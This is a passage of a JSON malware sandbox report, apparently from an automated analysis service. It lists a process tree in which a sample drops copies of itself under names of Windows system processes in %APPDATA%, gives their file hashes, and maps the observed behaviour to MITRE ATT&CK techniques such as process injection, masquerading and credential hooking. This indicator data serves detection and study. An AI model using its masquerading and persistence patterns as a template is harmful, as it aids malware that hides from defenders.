"sha256": "3c5bd74d7881744f3615565c1e582ea39078c18ef77c9ccb23816b96c77cae6d"}, {"uid": "00000000-00006052", "parentuid": "00000000-00006100", "name": "CSRSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\CSRSS.EXE", "sha256": "12d325d570818306f658c3b2eb62d6c36afc4ec3806024300e2ec350499d9df1"}, {"uid": "00000000-00002768", "parentuid": "00000000-00006100", "name": "SERVICES.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SERVICES.EXE", "sha256": "3c5bd74d7881744f3615565c1e582ea39078c18ef77c9ccb23816b96c77cae6d"}, {"uid": "00000000-00004080", "parentuid": "00000000-00006100", "name": "LSASS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\LSASS.EXE", "sha256": "06ab4e180e1ae41d961fba22adeef8ecf6ac5cb72e8f3643233f2d0459f834f1"}, {"uid": "00000000-00003736", "parentuid": "00000000-00006100", "name": "SMSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SMSS.EXE", "sha256": "ab1ffe2016336258130bb2928443ffdef7517d5fe93b128f88cb0c8a99fd9eca"}, {"uid": "00000000-00003760", "parentuid": "00000000-00005900", "name": "SERVICES.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SERVICES.EXE", "sha256": "3c5bd74d7881744f3615565c1e582ea39078c18ef77c9ccb23816b96c77cae6d"}, {"uid": "00000000-00004100", "parentuid": "00000000-00005900", "name": "LSASS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\LSASS.EXE", "sha256": "06ab4e180e1ae41d961fba22adeef8ecf6ac5cb72e8f3643233f2d0459f834f1"}, {"uid": "00000000-00002812", "parentuid": "00000000-00004100", "name": "4k51k4.exe", "normalized_path": "%WINDIR%\\4k51k4.exe", "sha256": "9cb84913dec874677e3a8e4974caed53bee7d92b857baf7254d1780f44479851"}, {"uid": "00000000-00001588", "parentuid": "00000000-00004100", "name": "IExplorer.exe", "normalized_path": "%WINDIR%\\system32\\IExplorer.exe", "sha256": "4e2fd38cf8a64c46ffd844a09a42ada0141140cab705a49876e9c0fec9613dbd"}, {"uid": "00000000-00005980", "parentuid": "00000000-00004100", "name": "WINLOGON.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\WINLOGON.EXE", "sha256": "3c5bd74d7881744f3615565c1e582ea39078c18ef77c9ccb23816b96c77cae6d"}, {"uid": "00000000-00000824", "parentuid": "00000000-00004100", "name": "CSRSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\CSRSS.EXE", "sha256": "12d325d570818306f658c3b2eb62d6c36afc4ec3806024300e2ec350499d9df1"}, {"uid": "00000000-00002616", "parentuid": "00000000-00004100", "name": "SERVICES.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SERVICES.EXE", "sha256": "3c5bd74d7881744f3615565c1e582ea39078c18ef77c9ccb23816b96c77cae6d"}, {"uid": "00000000-00001844", "parentuid": "00000000-00004100", "name": "LSASS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\LSASS.EXE", "sha256": "06ab4e180e1ae41d961fba22adeef8ecf6ac5cb72e8f3643233f2d0459f834f1"}, {"uid": "00000000-00003480", "parentuid": "00000000-00004100", "name": "SMSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SMSS.EXE", "sha256": "ab1ffe2016336258130bb2928443ffdef7517d5fe93b128f88cb0c8a99fd9eca"}, {"uid": "00000000-00002968", "parentuid": "00000000-00004100", "name": "4k51k4.exe", "normalized_path": "%WINDIR%\\4k51k4.exe", "sha256": "a15a94e364df82fde8fd585fff9b3ec799a23f4dff70438bd8a0bb75438b469e"}, {"uid": "00000000-00004140", "parentuid": "00000000-00005900", "name": "SMSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SMSS.EXE", "sha256": "ab1ffe2016336258130bb2928443ffdef7517d5fe93b128f88cb0c8a99fd9eca"}, {"uid": "00000000-00005744", "parentuid": "00000000-00005648", "name": "IExplorer.exe", "normalized_path": "%WINDIR%\\system32\\IExplorer.exe", "sha256": "4e2fd38cf8a64c46ffd844a09a42ada0141140cab705a49876e9c0fec9613dbd"}, {"uid": "00000000-00006092", "parentuid": "00000000-00005744", "name": "4k51k4.exe", "normalized_path": "%WINDIR%\\4k51k4.exe", "sha256": "9cb84913dec874677e3a8e4974caed53bee7d92b857baf7254d1780f44479851"}, {"uid": "00000000-00005948", "parentuid": "00000000-00005744", "name": "IExplorer.exe", "normalized_path": "%WINDIR%\\system32\\IExplorer.exe", "sha256": "4e2fd38cf8a64c46ffd844a09a42ada0141140cab705a49876e9c0fec9613dbd"}, {"uid": "00000000-00006136", "parentuid": "00000000-00005744", "name": "WINLOGON.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\WINLOGON.EXE", "sha256": "3c5bd74d7881744f3615565c1e582ea39078c18ef77c9ccb23816b96c77cae6d"}, {"uid": "00000000-00003924", "parentuid": "00000000-00005744", "name": "CSRSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\CSRSS.EXE", "sha256": "12d325d570818306f658c3b2eb62d6c36afc4ec3806024300e2ec350499d9df1"}, {"uid": "00000000-00003484", "parentuid": "00000000-00005744", "name": "SERVICES.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SERVICES.EXE", "sha256": "3c5bd74d7881744f3615565c1e582ea39078c18ef77c9ccb23816b96c77cae6d"}, {"uid": "00000000-00003400", "parentuid": "00000000-00005744", "name": "LSASS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\LSASS.EXE", "sha256": "06ab4e180e1ae41d961fba22adeef8ecf6ac5cb72e8f3643233f2d0459f834f1"}, {"uid": "00000000-00004288", "parentuid": "00000000-00005744", "name": "SMSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SMSS.EXE", "sha256": "ab1ffe2016336258130bb2928443ffdef7517d5fe93b128f88cb0c8a99fd9eca"}, {"uid": "00000000-00005852", "parentuid": "00000000-00005648", "name": "WINLOGON.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\WINLOGON.EXE", "sha256": "3c5bd74d7881744f3615565c1e582ea39078c18ef77c9ccb23816b96c77cae6d"}, {"uid": "00000000-00004144", "parentuid": "00000000-00005852", "name": "4k51k4.exe", "normalized_path": "%WINDIR%\\4k51k4.exe", "sha256": "9cb84913dec874677e3a8e4974caed53bee7d92b857baf7254d1780f44479851"}, {"uid": "00000000-00004088", "parentuid": "00000000-00005852", "name": "IExplorer.exe", "normalized_path": "%WINDIR%\\system32\\IExplorer.exe", "sha256": "4e2fd38cf8a64c46ffd844a09a42ada0141140cab705a49876e9c0fec9613dbd"}, {"uid": "00000000-00003996", "parentuid": "00000000-00005852", "name": "WINLOGON.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\WINLOGON.EXE", "sha256": "3c5bd74d7881744f3615565c1e582ea39078c18ef77c9ccb23816b96c77cae6d"}, {"uid": "00000000-00004328", "parentuid": "00000000-00005852", "name": "CSRSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\CSRSS.EXE", "sha256": "12d325d570818306f658c3b2eb62d6c36afc4ec3806024300e2ec350499d9df1"}, {"uid": "00000000-00001400", "parentuid": "00000000-00005852", "name": "SERVICES.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SERVICES.EXE", "sha256": "3c5bd74d7881744f3615565c1e582ea39078c18ef77c9ccb23816b96c77cae6d"}, {"uid": "00000000-00003512", "parentuid": "00000000-00005852", "name": "LSASS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\LSASS.EXE", "sha256": "06ab4e180e1ae41d961fba22adeef8ecf6ac5cb72e8f3643233f2d0459f834f1"}, {"uid": "00000000-00003560", "parentuid": "00000000-00005852", "name": "SMSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SMSS.EXE", "sha256": "ab1ffe2016336258130bb2928443ffdef7517d5fe93b128f88cb0c8a99fd9eca"}, {"uid": "00000000-00004192", "parentuid": "00000000-00005648", "name": "CSRSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\CSRSS.EXE", "sha256": "12d325d570818306f658c3b2eb62d6c36afc4ec3806024300e2ec350499d9df1"}, {"uid": "00000000-00006024", "parentuid": "00000000-00005648", "name": "SERVICES.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SERVICES.EXE", "sha256": "3c5bd74d7881744f3615565c1e582ea39078c18ef77c9ccb23816b96c77cae6d"}, {"uid": "00000000-00003688", "parentuid": "00000000-00006024", "name": "4k51k4.exe", "normalized_path": "%WINDIR%\\4k51k4.exe", "sha256": "9cb84913dec874677e3a8e4974caed53bee7d92b857baf7254d1780f44479851"}, {"uid": "00000000-00003420", "parentuid": "00000000-00006024", "name": "IExplorer.exe", "normalized_path": "%WINDIR%\\system32\\IExplorer.exe", "sha256": "4e2fd38cf8a64c46ffd844a09a42ada0141140cab705a49876e9c0fec9613dbd"}, {"uid": "00000000-00002772", "parentuid": "00000000-00006024", "name": "WINLOGON.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\WINLOGON.EXE", "sha256": "3c5bd74d7881744f3615565c1e582ea39078c18ef77c9ccb23816b96c77cae6d"}, {"uid": "00000000-00003268", "parentuid": "00000000-00006024", "name": "CSRSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\CSRSS.EXE", "sha256": "12d325d570818306f658c3b2eb62d6c36afc4ec3806024300e2ec350499d9df1"}, {"uid": "00000000-00002764", "parentuid": "00000000-00006024", "name": "SERVICES.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SERVICES.EXE", "sha256": "3c5bd74d7881744f3615565c1e582ea39078c18ef77c9ccb23816b96c77cae6d"}, {"uid": "00000000-00004148", "parentuid": "00000000-00006024", "name": "LSASS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\LSASS.EXE", "sha256": "06ab4e180e1ae41d961fba22adeef8ecf6ac5cb72e8f3643233f2d0459f834f1"}, {"uid": "00000000-00003744", "parentuid": "00000000-00006024", "name": "SMSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SMSS.EXE", "sha256": "ab1ffe2016336258130bb2928443ffdef7517d5fe93b128f88cb0c8a99fd9eca"}, {"uid": "00000000-00004984", "parentuid": "00000000-00006024", "name": "4k51k4.exe", "normalized_path": "%WINDIR%\\4k51k4.exe", "sha256": "a15a94e364df82fde8fd585fff9b3ec799a23f4dff70438bd8a0bb75438b469e"}, {"uid": "00000000-00003956", "parentuid": "00000000-00005648", "name": "LSASS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\LSASS.EXE", "sha256": "06ab4e180e1ae41d961fba22adeef8ecf6ac5cb72e8f3643233f2d0459f834f1"}, {"uid": "00000000-00003604", "parentuid": "00000000-00005648", "name": "SMSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SMSS.EXE", "sha256": "ab1ffe2016336258130bb2928443ffdef7517d5fe93b128f88cb0c8a99fd9eca"}, {"uid": "00000000-00002780", "parentuid": "00000000-00003604", "name": "4k51k4.exe", "normalized_path": "%WINDIR%\\4k51k4.exe", "sha256": "9cb84913dec874677e3a8e4974caed53bee7d92b857baf7254d1780f44479851"}, {"uid": "00000000-00003240", "parentuid": "00000000-00003604", "name": "IExplorer.exe", "normalized_path": "%WINDIR%\\system32\\IExplorer.exe", "sha256": "4e2fd38cf8a64c46ffd844a09a42ada0141140cab705a49876e9c0fec9613dbd"}, {"uid": "00000000-00000648", "parentuid": "00000000-00003604", "name": "WINLOGON.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\WINLOGON.EXE", "sha256": "3c5bd74d7881744f3615565c1e582ea39078c18ef77c9ccb23816b96c77cae6d"}, {"uid": "00000000-00003908", "parentuid": "00000000-00003604", "name": "CSRSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\CSRSS.EXE", "sha256": "12d325d570818306f658c3b2eb62d6c36afc4ec3806024300e2ec350499d9df1"}, {"uid": "00000000-00003184", "parentuid": "00000000-00003604", "name": "SERVICES.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SERVICES.EXE", "sha256": "3c5bd74d7881744f3615565c1e582ea39078c18ef77c9ccb23816b96c77cae6d"}, {"uid": "00000000-00002196", "parentuid": "00000000-00003604", "name": "LSASS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\LSASS.EXE", "sha256": "06ab4e180e1ae41d961fba22adeef8ecf6ac5cb72e8f3643233f2d0459f834f1"}, {"uid": "00000000-00003544", "parentuid": "00000000-00003604", "name": "SMSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SMSS.EXE", "sha256": "ab1ffe2016336258130bb2928443ffdef7517d5fe93b128f88cb0c8a99fd9eca"}, {"uid": "00000000-00003000", "parentuid": "00000000-00005648", "name": "4k51k4.exe", "normalized_path": "%WINDIR%\\4k51k4.exe", "sha256": "a15a94e364df82fde8fd585fff9b3ec799a23f4dff70438bd8a0bb75438b469e"}, {"uid": "00000000-00003360", "parentuid": "00000000-00003000", "name": "4k51k4.exe", "normalized_path": "%WINDIR%\\4k51k4.exe", "sha256": "a15a94e364df82fde8fd585fff9b3ec799a23f4dff70438bd8a0bb75438b469e"}, {"uid": "00000000-00004808", "parentuid": "00000000-00003000", "name": "IExplorer.exe", "normalized_path": "%WINDIR%\\system32\\IExplorer.exe", "sha256": "9517a5191067301b3cfc053dfa929b74bfa66c3a4e99718010b05bd3b3fda58c"}, {"uid": "00000000-00005004", "parentuid": "00000000-00003000", "name": "WINLOGON.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\WINLOGON.EXE", "sha256": "219a27729720bce9867f281eb022c5d2f4ba3984b917cc6c316100fcaa0fd342"}, {"uid": "00000000-00003488", "parentuid": "00000000-00005648", "name": "IExplorer.exe", "normalized_path": "%WINDIR%\\system32\\IExplorer.exe", "sha256": "9517a5191067301b3cfc053dfa929b74bfa66c3a4e99718010b05bd3b3fda58c"}], "mitre_attcks": [{"tactic": "Initial Access", "technique": "Drive-by Compromise", "attck_id": "T1189", "attck_id_wiki": "https://attack.mitre.org/techniques/T1189", "suspicious_identifiers_count": 1}, {"tactic": "Execution", "technique": "Native API", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106", "suspicious_identifiers_count": 2, "informative_identifiers_count": 8}, {"tactic": "Execution", "technique": "Inter-Process Communication", "attck_id": "T1559", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559", "informative_identifiers_count": 1}, {"tactic": "Execution", "technique": "Shared Modules", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129", "informative_identifiers_count": 5}, {"tactic": "Execution", "technique": "Service Execution", "attck_id": "T1569.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1569/002", "informative_identifiers_count": 1, "parent": {"technique": "System Services", "attck_id": "T1569", "attck_id_wiki": "https://attack.mitre.org/techniques/T1569"}}, {"tactic": "Execution", "technique": "Malicious File", "attck_id": "T1204.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1204/002", "malicious_identifiers_count": 1, "parent": {"technique": "User Execution", "attck_id": "T1204", "attck_id_wiki": "https://attack.mitre.org/techniques/T1204"}}, {"tactic": "Persistence", "technique": "Kernel Modules and Extensions", "attck_id": "T1547.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/006", "suspicious_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Persistence", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 1}, {"tactic": "Persistence", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "informative_identifiers_count": 1, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Persistence", "technique": "Registry Run Keys / Startup Folder", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001", "suspicious_identifiers_count": 2, "informative_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Persistence", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Privilege Escalation", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Kernel Modules and Extensions", "attck_id": "T1547.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/006", "suspicious_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Privilege Escalation", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 2, "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Privilege Escalation", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Token Impersonation/Theft", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001", "informative_identifiers_count": 1, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Privilege Escalation", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "informative_identifiers_count": 1, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Privilege Escalation", "technique": "Registry Run Keys / Startup Folder", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001", "suspicious_identifiers_count": 2, "informative_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Privilege Escalation", "technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134", "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "File Deletion", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004", "suspicious_identifiers_count": 2, "informative_identifiers_count": 2, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "Modify Registry", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112", "informative_identifiers_count": 4}, {"tactic": "Defense Evasion", "technique": "File and Directory Permissions Modification", "attck_id": "T1222", "attck_id_wiki": "https://attack.mitre.org/techniques/T1222", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Hidden Window", "attck_id": "T1564.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564/003", "informative_identifiers_count": 2, "parent": {"technique": "Hide Artifacts", "attck_id": "T1564", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564"}}, {"tactic": "Defense Evasion", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 2, "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Token Impersonation/Theft", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001", "informative_identifiers_count": 1, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Defense Evasion", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "suspicious_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Match Legitimate Name or Location", "attck_id": "T1036.005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036/005", "malicious_identifiers_count": 2, "parent": {"technique": "Masquerading", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036"}}, {"tactic": "Defense Evasion", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "Software Packing", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002", "suspicious_identifiers_count": 3, "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Embedded Payloads", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009", "suspicious_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Timestomp", "attck_id": "T1070.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/006", "suspicious_identifiers_count": 2, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "suspicious_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027", "suspicious_identifiers_count": 1, "informative_identifiers_count": 3}, {"tactic": "Defense Evasion", "technique": "Dynamic API Resolution", "attck_id": "T1027.007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/007", "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Indicator Removal from Tools", "attck_id": "T1027.005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/005", "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Masquerading", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036", "suspicious_identifiers_count": 3}, {"tactic": "Defense Evasion", "technique": "Masquerade File Type", "attck_id": "T1036.008", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036/008", "suspicious_identifiers_count": 1, "parent": {"technique": "Masquerading", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036"}}, {"tactic": "Defense Evasion", "technique": "Deobfuscate/Decode Files or Information", "attck_id": "T1140", "attck_id_wiki": "https://attack.mitre.org/techniques/T1140", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Execution Guardrails", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480", "informative_identifiers_count": 1}, {"tactic": "Credential Access", "technique": "Credential API Hooking", "attck_id": "T1056.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/004", "malicious_identifiers_count": 2, "suspicious_identifiers_count": 1, "parent": {"technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056"}}, {"tactic": "Discovery", "technique": "File and Directory Discovery", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083", "suspicious_identifiers_count": 2, "informative_identifiers_count": 10}, {"tactic": "Discovery", "technique": "System Information Discovery", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082", "suspicious_identifiers_count": 2, "informative_identifiers_count": 6}, {"tactic": "Discovery", "technique": "Query Registry", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "Process Discovery", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 3, "informative_identifiers_count": 7}, {"tactic": "Discovery", "technique": "Application Window Discovery", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010", "informative_identifiers_count": 5}, {"tactic": "Discovery", "technique": "Remote System Discovery", "attck_id": "T1018", "attck_id_wiki": "https://attack.mitre.org/techniques/T1018", "suspicious_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Owner/User Discovery", "attck_id": "T1033", "attck_id_wiki": "https://attack.mitre.org/techniques/T1033", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "suspicious_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Peripheral Device Discovery", "attck_id": "T1120", "attck_id_wiki": "https://attack.mitre.org/techniques/T1120", "malicious_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "suspicious_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "System Language Discovery", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001", "informative_identifiers_count": 1, "parent": {"technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614"}}, {"tactic": "Collection", "technique": "Local Data Staging", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001", "informative_identifiers_count": 2, "parent": {"technique": "Data Staged", "attck_id": "T1074", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074"}}, {"tactic": "Collection", "technique": "Screen Capture", "attck_id": "T1113", "attck_id_wiki": "https://attack.mitre.org/techniques/T1113", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Data from Local System", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Credential API Hooking", "attck_id": "T1056.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/004", "malicious_identifiers_count": 2, "suspicious_identifiers_count": 1, "parent": {"technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056"}}, {"tactic": "Command and Control", "technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Ingress Tool Transfer", "attck_id": "T1105", "attck_id_wiki": 